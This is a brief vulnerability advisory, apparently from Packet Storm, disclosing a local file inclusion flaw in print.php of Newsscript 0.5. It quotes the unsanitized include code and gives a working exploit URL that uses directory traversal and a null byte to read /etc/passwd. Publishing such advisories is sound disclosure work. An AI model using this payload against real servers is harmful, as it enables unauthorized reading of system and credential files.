Newsscript version 0.5 suffers from a local file inclusion flaw in print.php.
d5b175e18bd85013db5424ccdf23bd98f5ca37cb59fbd8ade11c6f9a57df8403# Subject:
--- "Newsscript version 0.5 (print.php) Local File Inclusion Vulnerability "
# Vulnerable version:
--- "Newsscript version 0.5"
# Vendor URL:
--- Emaill - mail@webmaster-journal.com
--- Website - http://webmaster-journal.com
# Available in:
---http://www.comscripts.com/scripts/php.wm-news.203.html
# Vulnerability:
--- Vulnerable code in print/print.php
--- $ide var is not sanitized and can be used to include files from local resources
--- 1 <html>
--- 2 <head>
--- 3 <?
--- 4 $file_name = "../".$ide.".txt";
--- 5 ?>
---
---
--- 27 include($file_name);
# Exploit:
--- http://localhost/newscript/print/print.php?ide=../../../../etc/passwd%00
# Discovered By:
--- Daftrix[at]Gmail.com
--- Daftrix Security Investigations
--- http://www.daftrix.com
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed